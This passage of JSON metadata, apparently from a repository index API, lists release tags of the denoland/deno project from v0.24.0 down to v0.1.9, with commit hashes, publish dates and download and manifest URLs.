positories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositor